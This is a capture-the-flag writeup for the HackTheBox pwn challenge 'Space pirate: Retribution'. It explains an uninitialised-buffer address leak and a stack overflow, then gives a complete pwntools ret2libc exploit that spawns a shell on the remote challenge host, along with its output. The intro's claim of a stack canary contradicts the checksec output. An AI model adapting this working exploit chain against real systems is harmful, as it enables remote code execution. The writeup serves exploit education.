HackTheBox-Challenges Space pirate: Retribution Writeup

kazma, founder and president of the NCKU Information Security Club

Exploitation

Let's go straight to the main logic of this challenge and its protections:
PIE is enabled and there is a canary, so we need to leak a stack variable and then do ret2libc.

└─$ checksec ./sp_retribution
[*] '/home/kazma/challenge3/sp_retribution'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
RUNPATH: b'./glibc/'
int missile_launcher()
{
    __int64 v1[4]; // [rsp+0h] [rbp-50h] BYREF
    char buf[32]; // [rsp+20h] [rbp-30h] BYREF
    __int64 v3; // [rsp+40h] [rbp-10h]
    __int64 v4; // [rsp+48h] [rbp-8h]

    v4 = 0x53E5854620FB399FLL;
    v3 = 0x576B96B95DF201F9LL;
    printf(
        "\n[*] Current target's coordinates: x = [0x%lx], y = [0x%lx]\n\n[*] Insert new coordinates: x = [0x%lx], y = ",
        0x53E5854620FB399FLL,
        0x576B96B95DF201F9LL,
        0x53E5854620FB399FLL);
    memset(v1, 0, sizeof(v1));
    read(0, buf, 0x1FuLL);
    printf("\n[*] New coordinates: x = [0x53e5854620fb399f], y = %s\n[*] Verify new coordinates? (y/n): ", buf);
    read(0, v1, 0x84uLL);
    return printf(
        "\n%s[-] Permission Denied! You need flag.txt in order to proceed. Coordinates have been reset!%s\n",
        "\x1B[1;31m",
        "\x1B[1;34m");
}

Two obvious vulnerabilities are visible.
First, buf is never initialised and is then printed back with %s, so by writing different lengths into it we can try to find a usable stack address or even a libc address. Many writeups online get this part wrong: the root cause of the vulnerability is the missing initialisation.
The second read is a plain buffer overflow, so nothing surprising there. Our plan is therefore to leak an address from the stack, compute the PIE base from it, use the PIE base to call puts and leak a GOT entry to find the libc base, and finally overflow again into system('/bin/sh').
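The first read in its vulnerable and hardened forms, as an added example (not the challenge binary's or the author's code). The frame model and the two constants mirror the decompile above; the 0x41 filler standing in for stale stack data and the memcpy modelling the bytes read are constructed assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed model of missile_launcher's frame: buf[32] sits directly
 * below the two 8-byte coordinates, as in the decompiled layout above. */
struct frame {
    char     buf[32];   /* [rbp-0x30], target of read(0, buf, 0x1F) */
    uint64_t v3;        /* [rbp-0x10] */
    uint64_t v4;        /* [rbp-0x08] */
};

/* How many bytes printf("%s", buf) would emit: scan for the first NUL,
 * but never past the end of the frame model. */
static size_t printed_len(const struct frame *f)
{
    const char *p = (const char *)f;
    size_t i = 0;
    while (i < sizeof *f && p[i] != '\0')
        i++;
    return i;
}

/* Vulnerable pattern (as in the binary): buf is never zeroed and read()
 * does not NUL-terminate, so %s keeps walking into whatever follows it.
 * 0x41 stands in for stale stack data; memcpy models the n bytes read. */
size_t leaky_len(struct frame *f, const char *in, size_t n)
{
    memset(f, 0x41, sizeof *f);
    f->v3 = 0x576B96B95DF201F9ULL;
    f->v4 = 0x53E5854620FB399FULL;
    memcpy(f->buf, in, n < 0x1F ? n : 0x1F);
    return printed_len(f);
}

/* Hardened pattern: zero the buffer, cap the read at sizeof(buf) - 1 and
 * terminate at the byte count the read actually returned. */
size_t safe_len(struct frame *f, const char *in, size_t n)
{
    memset(f, 0x41, sizeof *f);            /* same stale data as above */
    f->v3 = 0x576B96B95DF201F9ULL;
    f->v4 = 0x53E5854620FB399FULL;
    memset(f->buf, 0, sizeof f->buf);
    if (n > sizeof f->buf - 1)
        n = sizeof f->buf - 1;
    memcpy(f->buf, in, n);
    f->buf[n] = '\0';
    return printed_len(f);
}
```

With the exploit's 7 bytes plus newline, the vulnerable form prints the whole 48-byte frame because no NUL is ever reached, while the hardened form prints exactly the 8 bytes received.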

Exploit

import warnings

from pwn import *

context.arch = "amd64"
elf = ELF("sp_retribution")
l = ELF("./glibc/libc.so.6")

warnings.filterwarnings("ignore", category=BytesWarning)

# r = process("./sp_retribution")
r = remote("94.237.59.180", 45699)

# Step 1: Find PIE Base
# buf is never initialised, so the 7 'a's plus the newline are followed by a
# stale code pointer that printf("%s") prints right after them.
r.sendlineafter(b">> ", "2")
r.sendlineafter(b"[*] Insert new coordinates: x = [0x53e5854620fb399f], y = ", b"a" * 7)
r.recvuntil(b"aaaaaaa\n")
leak = u64(r.recvline().strip().ljust(8, b"\0"))
success("Leaked PIE --> %#0x", leak)
# gdb.attach(r)
base = leak - 3440  # the leaked pointer sits at PIE base + 0xd70
success("Find PIE Base --> %#0x", base)

# Step 2: Find Libc Base
# v1 is at rbp-0x50, so 0x58 bytes of padding reach the saved return address.
rop = ROP(elf)
p = flat(
    b"a" * 0x58,
    base + rop.rdi[0],                # pop rdi; ret
    base + elf.got.puts,
    base + elf.plt.puts,              # puts(got.puts) prints the libc address
    base + elf.sym.missile_launcher,  # come back for a second overflow
)
r.sendlineafter(b"(y/n): ", p)
r.recvuntil(b"reset!")
r.recvline()
puts_got = u64(r.recv(6).ljust(8, b"\0"))
l.address = puts_got - l.sym["puts"]
success("Find libc base --> %#0x", l.address)

# Step 3: system('/bin/sh')
system = l.sym.system
bin_sh = next(l.search("/bin/sh\0"))
p2 = flat(b"a" * 0x58, base + rop.rdi[0], bin_sh, system)
r.sendlineafter(b"new coordinates: x = [0x53e5854620fb399f], y = ", "")
r.sendlineafter(b"(y/n): ", p2)
r.recvuntil(b"reset!")
r.sendline("cat flag.txt")
r.interactive()

Result:

└─$ python exploit.py
[*] '/home/kazma/challenge3/sp_retribution'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
RUNPATH: b'./glibc/'
[*] '/home/kazma/challenge3/glibc/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to 94.237.59.180 on port 45699: Done
[+] Leaked PIE --> 0x5626f6c00d70
[+] Find PIE Base --> 0x5626f6c00000
[*] Loaded 14 cached gadgets for 'sp_retribution'
[+] Find libc base --> 0x7f82e0a13000
[*] Switching to interactive mode

HTB{w3_f1n4lly_m4d3_1t}
[*] Got EOF while reading in interactive
$

Pwned

pwn

  • Title: HackTheBox-Challenges Space pirate: Retribution Writeup
  • Author: kazma
  • Created at : 2024-11-06 14:04:48
  • Updated at : 2024-11-06 15:11:15
  • Link: https://kazma.tw/2024/11/06/HackTheBox-Challenges-Space-pirate-Retribution-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.